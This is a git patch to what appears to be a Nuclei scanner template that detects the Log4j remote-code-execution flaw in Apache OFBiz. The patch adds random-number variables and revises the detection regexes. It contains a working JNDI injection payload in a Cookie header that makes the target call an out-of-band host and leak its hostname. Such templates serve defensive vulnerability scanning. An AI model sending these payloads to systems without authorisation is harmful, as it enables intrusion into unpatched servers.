From 3cf8d0bd94e4b63ee8bd4320c9fe17b1295c581c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 3 May 2023 17:21:48 +0530
Subject: [PATCH] Update All Existing Log4j Templates

---
 .../vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
index 6945955a8d..b5b082566d 100644
--- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -21,12 +21,16 @@ info:
     shodan-query: http.html:"Apache OFBiz"
   tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
         GET /webtools/control/main HTTP/1.1
         Host: {{Hostname}}
-        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+        Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}
 
     matchers-condition: and
     matchers:
@@ -38,13 +42,13 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by mp on 2022/05/27